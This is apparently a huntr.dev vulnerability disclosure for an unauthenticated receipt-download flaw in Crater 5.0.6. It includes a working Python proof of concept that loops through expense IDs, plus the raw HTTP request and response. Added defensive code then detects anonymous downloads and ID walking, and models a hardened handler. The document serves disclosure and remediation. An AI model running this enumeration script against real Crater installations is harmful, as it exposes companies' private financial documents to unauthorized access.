huntr | theworstcomrade | 395FC553-2B90-4E69-BA07-A316E1C06406
History: Dec 29, 2021 - 7:43 p.m.

Improper Access Control in crater-invoice/crater

2021-12-29 19:43:19
theworstcomrade
www.huntr.dev
8
crater-invoice
access control
exploitable vulnerability
receipts
unauthorized access

EPSS

0.001

Percentile

35.0%

Description

In a recent Crater version (commit faf1ef09, tag 5.0.6) I discovered that an unauthenticated user can download all expense receipts uploaded to any company.

Proof of Concept

import requests

# Host and port are the report's lab setup; the loop walks sequential expense IDs
for i in range(1, 100):
    r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')

    # No session cookie is sent, yet a 200 means the receipt was served anyway
    if r.status_code == 200:
        print(f'Downloaded receipt for expense No.{i}')

Vulnerable request:

GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
Set-Cookie: 8XSG7KqTTKX6kx0xn1mEIE2dq4kSyWAoyIUaK8CF=...; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax

%PDF-1.4
%äüöß
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...
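The request/response pair above has two tell-tale properties: no session cookie is sent, and the server still answers 200 with an attachment. The following detection logic is an added example written for this page, not code from the report or from Crater; the log format it parses (client IP, authenticated user id or "-" for anonymous, method, path, status) is a constructed assumption, since a stock web-server access log would not carry the user id. It flags every receipt served to an anonymous request, and separately flags clients that walk consecutive expense IDs, which is the traffic shape the proof of concept produces.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the report). Columns:
# ip, authenticated user id ("-" = anonymous), method, path, HTTP status.
SAMPLE_LOG = """\
10.0.0.5 - GET /expenses/1/download-receipt 404
10.0.0.5 - GET /expenses/2/download-receipt 200
10.0.0.5 - GET /expenses/3/download-receipt 200
10.0.0.5 - GET /expenses/4/download-receipt 200
10.0.0.5 - GET /expenses/5/download-receipt 404
10.0.0.9 42 GET /expenses/2/download-receipt 200
10.0.0.9 42 GET /login 200
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<user>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$')
# Only the receipt-download endpoint named in the report is of interest here.
RECEIPT_RE = re.compile(r'^/expenses/(?P<id>\d+)/download-receipt$')


def parse_log(text):
    """Return one event dict per receipt-download request; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line, ignore rather than crash the detector
        p = RECEIPT_RE.match(m['path'])
        if not p:
            continue  # not a receipt download
        events.append({
            'ip': m['ip'],
            'user': None if m['user'] == '-' else m['user'],
            'expense_id': int(p['id']),
            'status': int(m['status']),
        })
    return events


def find_unauthenticated_downloads(events):
    """Each receipt served (200) to a request with no authenticated user is a finding on its own."""
    return [e for e in events if e['user'] is None and e['status'] == 200]


def find_enumeration(events, min_run=3):
    """Map client IP -> longest run of consecutive expense IDs it requested,
    keeping only clients whose run is at least min_run (ID walking)."""
    ids_by_ip = defaultdict(set)
    for e in events:
        ids_by_ip[e['ip']].add(e['expense_id'])
    flagged = {}
    for ip, ids in ids_by_ip.items():
        ordered = sorted(ids)
        best = run = 1
        for prev, cur in zip(ordered, ordered[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            flagged[ip] = best
    return flagged


if __name__ == '__main__':
    evts = parse_log(SAMPLE_LOG)
    print('anonymous receipts served:', [e['expense_id'] for e in find_unauthenticated_downloads(evts)])
    print('ID-walking clients:', find_enumeration(evts))
```

The anonymous-200 check is the high-confidence signal: after the fix, that combination should never occur, so any hit is either a regression or a bypass. The consecutive-ID check is noisier and is meant to surface scanning even when the receipts themselves were refused (404s in the sample), which is why it counts requested IDs rather than successful ones.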

Impact

This vulnerability allows an unauthenticated user to download every expense receipt stored in the application.
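The missing control is an ownership check on the download route, not just a login check. The following is an added example written for this page, not Crater's own code: a small Python model of the handler with the reported behaviour placed beside a hardened version. The `User`, `Expense`, `EXPENSES` and `company_id` names are assumptions standing in for the application's real models; the hardened handler requires an authenticated user, scopes the lookup to that user's company, and answers 404 for both "no such expense" and "not your company" so that a caller cannot tell which IDs exist.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# Assumed, simplified models (not Crater's schema): a user belongs to one company,
# an expense belongs to one company and may or may not have a receipt on file.
@dataclass(frozen=True)
class User:
    id: int
    company_id: int

@dataclass(frozen=True)
class Expense:
    id: int
    company_id: int
    receipt_path: Optional[str]

# Constructed sample data standing in for the database.
EXPENSES = {
    1: Expense(1, company_id=10, receipt_path="receipts/1.pdf"),
    2: Expense(2, company_id=20, receipt_path="receipts/2.pdf"),
    3: Expense(3, company_id=10, receipt_path=None),
}

Response = Tuple[int, Optional[str]]  # (HTTP status, path of file to serve or None)


def download_receipt_vulnerable(user: Optional[User], expense_id: int) -> Response:
    """Models the reported behaviour: the expense is fetched by id alone,
    and neither the session nor the company is consulted."""
    expense = EXPENSES.get(expense_id)
    if expense is None or expense.receipt_path is None:
        return 404, None
    return 200, expense.receipt_path


def download_receipt_hardened(user: Optional[User], expense_id: int) -> Response:
    """Hardened handler: authenticate, then authorize against the caller's company."""
    # 1. No session at all: refuse before touching any data.
    if user is None:
        return 401, None
    # 2. Look the expense up *within* the caller's company. A foreign expense
    #    is reported exactly like a missing one so IDs cannot be probed.
    expense = EXPENSES.get(expense_id)
    if expense is None or expense.company_id != user.company_id:
        return 404, None
    # 3. Only now consult the receipt itself.
    if expense.receipt_path is None:
        return 404, None
    return 200, expense.receipt_path


if __name__ == "__main__":
    alice = User(id=1, company_id=10)
    print("vulnerable, anonymous, expense 2:", download_receipt_vulnerable(None, 2))
    print("hardened, anonymous, expense 2:  ", download_receipt_hardened(None, 2))
    print("hardened, alice, expense 2:      ", download_receipt_hardened(alice, 2))
    print("hardened, alice, expense 1:      ", download_receipt_hardened(alice, 1))
```

The ordering matters: the company filter is applied as part of the lookup rather than as an afterthought on the fetched object, which is the pattern that survives when the route is later reused or the query is rewritten. In a Laravel application the same effect is obtained by putting the route behind the auth middleware and constraining the Eloquent query to the current company before calling the download response.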
